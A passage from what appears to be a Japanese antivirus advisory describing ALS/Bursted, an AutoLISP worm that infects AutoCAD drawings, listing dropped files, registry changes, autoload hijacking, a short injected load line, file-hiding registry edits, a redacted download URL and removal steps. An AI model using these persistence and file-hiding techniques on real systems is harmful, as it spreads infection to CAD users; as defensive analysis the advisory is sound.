  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\sheetListTable\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\Symbol Libraries\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\ViewSheetSet\xrefs\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\ViewSheetSet\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Help\Tutorials\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\ActiveX\ExtAttr\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\ActiveX\SheetSetVBA\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\DesignCenter\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Dynamic Blocks\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Architectural\Res\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Architectural\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Civil\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Japanese\Res\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Japanese\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\Sheet Sets\Manufacturing\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\VBA\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Sample\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\Support\acad.fas
  • %Temp%\AutoCAD[年]Trial\Bin\acadFeui\Program Files\Root\UserDataCache\Template\acad.fas
  • %Temp%\AdskCleanup.0001.dir.0001\PfdRun.pfd
  • %Temp%\AdskCleanup.0001.dir.0001\~de6c66.tmp
  • %Temp%\AdskCleanup.0001.dir.0001\~df394b.tmp
  • %Temp%\AdskCleanup.0001.dir.0001\~efe2.tmp
  • %Temp%\UNDO.ac$
  • %UserProfile%\Recent\Dra1.dwg.lnk
  • %ProgramFiles%\AutoCAD [年]\Express\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Fonts\isomianyi.shx
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\createTransmittal\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\crossReference\Models\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\crossReference\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\PlaceView\Models\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\PlaceView\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\PublishSheetSet\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\sheetListTable\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\Symbol Libraries\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\ViewSheetSet\xrefs\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\ViewSheetSet\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Help\Tutorials\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\ActiveX\ExtAttr\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\ActiveX\SheetSetVBA\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\DesignCenter\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\Dynamic Blocks\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\Sheet Sets\Architectural\Res\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\Sheet Sets\Architectural\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\Sheet Sets\Civil\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\Sheet Sets\Manufacturing\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\VBA\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Sample\acad.fas
  • %ProgramFiles%\AutoCAD [年]\Support\acad.fas
  • %ProgramFiles%\AutoCAD [年]\UserDataCache\Template\acad.fas
  • %WINDIR%\system32\9AF7.CMD
  • %WINDIR%\DivX.fin
  • [*.dwg現在作業中のフォルダ]\ acad.fas
  • [:Removable drive]\pagefile

・以下のレジストリキー値がシステムに追加されます。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CorRegistration.AcPePropertyEditorTextEx.3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CorRegistration.AcPePropertyEditorTextEx.3\CLSID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings

・以下のレジストリキー値がシステムに追加されます。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\acad.exe\shell\open\ddeexec\application\: "AutoCAD.r16.DDE"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\acad.exe\shell\open\ddeexec\: "[open("%1")]"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\acad.exe\shell\open\command\: ""%Programfile%\AutoCAD [年]\acad.exe" "%1""
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\: "C:\WINDOWS\system32\cfgmgr32.dll"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\ThreadingModel: "Apartment"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\: "Description"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CorRegistration.AcPePropertyEditorTextEx.3\CLSID\: "{GUID}"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CorRegistration.AcPePropertyEditorTextEx.3\: "CorRegistration Object"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\: "Themes Setup"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\ComponentID: "Theme Component"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\IsInstalled: 0x00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\Local: "EN"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\Version: "1,1,1,7"
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\DrawingRecovery\LoggedFile1: "C:\Documents and Settings\Administrator\Desktop\fjh.dwg"
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Window\SDIMode: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\UseMRUConfig: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\HideSystemPrinters: 0x00000000

・上記のレジストリキー値により、AutoCADのシステムプリンタを隠すオプションがALS/Burstedによって無効にされるようにします。

  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PLSPOOLALERT: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PAPERUPDATE: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PLOTLEGACY: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\PSTYLEPOLICY: 0x00000001
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\OLEQUALITY: 0x00000003
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Anyport: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Validation Policy: 0x00000003
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\Validation Strategy: 0x00000001
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\TMN: "BB83"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\TMNL: "AF971"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\SHXN: "ad229A0"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\basepth: "%Appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\support"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\fontpth: "%Programfile%\AutoCAD [年]\Fonts"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\bz: "20121119"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\pth6: "20121119"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\pth1: "20121119"
  • HKEY_USERS\S-1-5-[不定]\Software\KenFiles\settings\wcrq: "102"

・以下のレジストリキー値が改変されます。

  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Recovery\LoggedFileCount: 0x00000000
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\Drawing Recovery\LoggedFileCount: 0x00000001
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\ACAD: "%Appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\support;%Programfile%\AutoCAD [年]\support;%Programfile%\AutoCAD [年]\fonts;%Programfile%\AutoCAD [年]\help;%Programfile%\AutoCAD [年]\Express;%Programfile%\AutoCAD [年]\support\color;"
  • HKEY_USERS\S-1-5-[不定]\Software\Autodesk\AutoCAD\R[バージョン]\ACAD-4001:409\Profiles\<<名前のないプロファイル>>\General\ACAD: "%Appdata%\Autodesk\AutoCAD [年]\R[バージョン]\enu\support;%Programfile%\AutoCAD [年]\support;%Programfile%\AutoCAD [年]\fonts;%Programfile%\AutoCAD [年]\help;%Programfile%\AutoCAD [年]\Express;%Programfile%\AutoCAD [年]\support\color;%Programfile%\AutoCAD [年]\Express"

・以下のレジストリキー値がシステムから削除されます。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\: "C:\WINDOWS\system32\dmloader.dll"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32\ThreadingModel: "Both"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{GUID}\: "ADOX.Column.2.8"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DirectAnimation.DVBCLocator.1\CLSID\: "{GUID}"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DirectAnimation.DVBCLocator.1\: "DirectAnimation Class"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\: "Themes Setup"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\ComponentID: "Theme Component"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\IsInstalled: 0x00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\Local: "EN"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}\Version: "1,1,1,7"

--2012年10月10日更新---

ALS/Burstedは、AutoCADアプリケーションのスクリプトの作成に使用するAutoLispプログラミング言語を使って作成されたウイルスです。ALS/Burstedは最初に以下のコマンドを使ってファイル名を取得し、ファイル名がDrawing1.dwgの場合、ファイルをDrawing1.dwgという名前で「My Documents」フォルダに保存します。

Lsp command: getvar "dwgname"

・次に、AutoCADのSupportフォルダの場所(%AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\)を確認するため、「base.dcl」のファイルパスを検索します。

・ALS/BurstedはAutoCADのSupportフォルダに「acadapp.lsp」が存在するか確認し、ファイルが存在しない場合は、自身を「acadapp.lsp」という名前でAutoCADのSupportフォルダにコピーし、描画ファイルが開かれると、ファイルが自動的にAutoCADによってロードされ、ALS/Burstedが実行されるようにします。

・また、以下のコマンドを付加することにより、AutoCADのSupportフォルダの「acad.mnl」ファイルに感染します。

(load "acadappp.lsp")
(princ)

・また、*.dwgファイルと一緒に、現在作業中のフォルダに「acad.lsp」という名前で自身をコピーします。

・実行時、以下のファイルがシステムに追加されます。

  • %AppData%\Autodesk\AutoCAD [年]\R[バージョン]\enu\Support\acadappp.lsp
  • [*.dwgの現在作業中のフォルダ]\acad.lsp

--2012年3月30日更新---

「ALS/Bursted」はAutoCADで使われるAutoLispスクリプト言語で作成されたウイルスです。AutoCADの描画ファイル(.dwg)として同じフォルダに格納されます。

・描画ファイルが開かれると、AutoCADによって自動的にロードされ、ALS/Burstedが実行されるようにします。乗っ取ったコンピュータの.dwgファイルに感染します。

・さらに、以下のファイルに感染する可能性があります。

  • %UserProfile%\Application Data\Autodesk\AutoCAD2007\R17.0\chs\support\acad\doc.lsp
  • %UserProfile%\Application Data\Autodesk\AutoCAD2007\R17.0\chs\support\acad\.mnl

・なお、2007は年、R17.0はバージョン、chsは中国語を表しています。

・上記のファイルが存在しない場合、ALS/Burstedによって作成されます。

・ALS/Burstedによって改変されるファイルの終わりには「;;;jjyy」というテキストが格納されます。

・さらに、以下の条件が満たされているか確認します。

  • 現在の日付が2009年9月9日以降
  • 現在の時間が偶数
  • MACアドレスがあらかじめ定められていた値

・上記の条件が満たされている場合、ALS/Burstedは、.dwgファイルに感染するため、以下のAutoCADコマンドを上書きします。

  • qsave
  • saveas
  • wblock
  • insert
  • pline

・上記のコマンドが.dwgファイルで実行されると、ALS/Burstedが乗っ取ったコンピュータのAutoCAD描画ファイルに感染します。

・また、ネットワークアダプタがネットワークに接続されているかどうか確認します。

・以下のレジストリ値が改変されます。

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
    CheckedValue = 0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN
    CheckedValue = 0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN
    DefaultValue = 0

・上記のレジストリ項目により、乗っ取ったユーザがシステムの隠しファイル、フォルダを閲覧できないようにします。


--2011年7月29日更新---

「ALS/Bursted」はAutoCADで使われるAutoLispスクリプト言語で作成されたウイルスです。AutoCADの描画ファイル(.dwg)として同じフォルダに格納されます。・描画ファイルが開かれると、AutoCADによって自動的にロードされ、ALS/Burstedが実行されるようにします。

・以下のレジストリ値が改変されます。

  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
    CHECKEDVALUE = 0
  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
    CHECKEDVALUE = 0
  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
    DEFAULTVALUE = 0

・上記のレジストリ項目により、乗っ取ったシステムのファイルが隠されます。


--2010年12月7日-----

・以下の動作を見せる亜種が確認されました。

・AutoCADの自動ロード機能を利用するため、サポートパスにある以下のファイルを見つけて削除し、置き換えようとします。

  • acad.fas
  • lcm.fas
  • acad.lsp

・ALS/BurstedによるAutoCADのコマンドの無効化は確認されていません。

--2010年9月28日-----

・「ALS/Bursted」はAutoCAD AutoLispスクリプト言語で作成されたワームです。リムーバブルドライブ、マップされたドライブを介して繁殖する可能性があります。また、マルウェアの作者が管理するWebサイトから悪質なファイルをダウンロードします。

・AutoCADのFASファイルの自動ローディングを利用して、自身を起動します。

・以下の場所に自身をコピーします。

  • %Windir%\DivX.fin
  • %ProgramFiles%\AutoCAD\Fonts\isohztxt.shx

・システムの乗っ取り後、.dwgファイルが格納されているフォルダを探し、DWGファイルが格納されているフォルダ内に悪質なファイル(acad.fas)を作成して拡散します。

・以下のレジストリキーがシステムに追加されます。

  • HKEY_CURRENT_USER\SOFTWARE\FileKen\settings

・以下のWebサイトに接続して、リモートサーバから悪質なファイルをダウンロードする可能性があります。

  • http://www.cad[削除].com/z/bkd.gif

・攻撃者は、ALS/Burstedを使って、システムを完全に制御し、ICMP pingメッセージを以下のIPアドレスに送信して、バックドア活動を仕掛けます。

"update[削除]800.org"

・ALS/BurstedはACAD/Burstedとして検出され、AutoLisp(AutoCADアプリケーションのスクリプトに使用された言語)で作成されています。ALS/Burstedは、current workingディレクトリのacad.lspファイルに含まれます(.dwgファイルも同じディレクトリに存在します)。ドローファイルがロードされると、acad.lspファイルは自動実行します。

・次に、AutoCad Supportディレクトリにacadapp.lspファイルをコピーして、ACADアプリケーションの起動時に実行します。

・3種類のAutoCadコマンド(EXPLODE、XREF、およびXBIND)を無効にして、メッセージを表示する新しいコマンド(BURST)を定義します。

TOPへ戻る

以下の症状が見られる場合、このウイルスに感染している可能性があります。

・BURSTコマンドが中国語でメッセージを表示します。

・上記の動作が見られます。

TOPへ戻る

感染方法

・感染したacad.lspファイルを介して感染します。

・乗っ取ったマシンの「acad.lsp」および「acad.mnl」ファイルに自動的に感染します。

TOPへ戻る

駆除方法

全ての Windows ユーザー

脅威と危険と思われる要素を取り除くため、サポートされているすべてのWindowsに対して以下の処置を行ってください。
  1. システムリストアを無効にしてください。
  2. 脅威の検出・駆除のために最新のエンジンとDATにアップデートしてください。
  3. Complete system scanを実行してください。
    システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した場合は正常に駆除されます
  4. 回復コンソールでクリーンなMBRに修復してください。

Windows XPの場合

CD-ROM ドライブに Windows XP CD-ROM を挿入し、コンピュータを再起動します。
「セットアップの開始」 画面が表示されたら、R キーを押して回復コンソールを起動します。
対象となるWindowsのインストールを選択し、管理者パスワードを入力してください。
マスタ ブート レコードを修復するfixmbrコマンドを発行します。
画面上の指示に従ってください。
CD-ROM ドライブからCDを取り出しリセットしてください。


Windows Vista および 7 の場合

CD-ROM ドライブに Windows CD-ROM を挿入し、コンピュータを再起動します。
「コンピュータを修復する」をクリックします。
[システム回復オプション] ダイアログ ボックスで、[コマンド プロンプト] を選択します。
マスタ ブート レコードを修復するbootrec /fixmbrコマンドを発行します。
画面上の指示に従ってください。
CD-ROM ドライブからCDを取り出しリセットしてください。

TOPへ戻る